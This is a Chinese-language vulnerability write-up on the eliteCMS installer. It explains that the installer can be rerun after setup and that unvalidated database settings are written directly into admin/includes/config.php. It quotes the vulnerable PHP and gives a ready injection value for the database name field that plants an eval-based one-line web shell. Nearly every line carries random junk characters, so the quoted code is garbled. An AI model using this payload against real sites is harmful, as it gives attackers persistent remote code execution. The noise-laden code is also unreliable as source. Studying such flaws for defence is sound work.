eliteCMS的安装程序安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装5 Y2 @- ~8 T# n, q
* Y4 G: V4 j( P" r/ i* l/ D _" \
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php
4 ?4 q, l$ |. e% M9 u& h我们来看代码:
+ A$ t' a m7 s- G2 b5 b+ u) G2 K! f 1 P/ F, L- t* A5 f. r4 Z* p' h
...6 f, J6 G& K) j3 J$ s
elseif ($_GET['step'] == "4") {* o1 Q) `( @4 ^, d$ [
$file = "../admin/includes/config.php";' A, V# [! _* }3 j; C( l k
$write = "<?php\n";; M. q! b% x$ X {0 |
$write .= "/**\n";% V6 {- R0 Q9 T- j# s F
$write .= "*\n";
7 s' U5 Y& P) H2 S $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
! ~% S# I3 S1 ?# y* u; ~4 e8 ?...略...5 h2 {1 X6 f# J2 h+ A$ E( U
$write .= "*\n";
5 X6 l3 G: @6 z: V $write .= "*/\n";
) @2 r& p2 U8 f5 Q1 Z9 P; H" k $write .= "\n";& T) W3 h8 [) J. ^
$write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";" E* V$ D* c: B/ o' y! ?
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";& N3 v/ m! U. _0 z6 I+ S0 I
$write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
# W' q; |) A+ m $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";) [6 y- Z: k' F: h( j
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";3 ~; O2 j- n+ E. \
$write .= "if (!\$connection) {\n"; r4 k! s# o3 S) s3 z
$write .= " die(\"Database connection failed\" .mysql_error());\n";$ f8 \, @* b/ O! {# ^
$write .= " \n";; B: W/ y& a4 M P* @, X6 {
$write .= "} \n";
6 A0 V( U; n2 d M! a $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";' T+ m& O8 I: R- k; \- z
$write .= "if (!\$db_select) {\n";
f5 P7 E! s5 n$ K. ] $write .= " die(\"Database select failed\" .mysql_error());\n";* ~4 \. F6 q$ z8 w
$write .= " \n";
, ?& a8 ^+ m2 ]/ `: O $write .= "} \n";$ Q" W9 K* j- t; u1 T- P
$write .= "?>\n";5 p3 A! Z/ R4 q2 B( g4 k) U U' i
) x3 m/ N8 Y. [7 X" z% D+ R3 t" x# B
$writer = fopen($file, 'w');
/ I, `) Z3 q' a; _/ t4 ?...
7 `% w3 g4 J# o% G ) Y' K' c8 z# s0 {, b2 p% G, G* w
在看代码: Y' w' [5 |: {8 l. l$ K$ B. H0 e7 F
/ ~3 m% Z1 `/ f6 n) c: m$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
7 ?. ^% T3 O! ~% f' e0 u0 g. v$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
1 E1 R6 S5 ?# E3 u: t$_SESSION['DB_USER'] = $_POST['DB_USER'];
; I( b* D3 }9 t. J4 p% [9 B$_SESSION['DB_PASS'] = $_POST['DB_PASS'];/ K6 V; X- L, e/ K8 f; H1 c: l3 `
4 U3 \, k, g% b取值未作任何验证7 L4 }' h+ h" X/ `9 U
如果将数据库名POST数据:
& W9 ~) B+ Y6 ~2 N, Z, ? / o% S! g2 g% K. |* ^
"?><?php eval($_POST[c]);?><?php m0 V9 H/ D7 K( z& i1 A E
( R* x+ ^, m; R6 D3 B" y将导致一句话后门写入/admin/includes/config.php$ h2 J2 K3 ^5 f6 N6 x2 t" }, G ?
|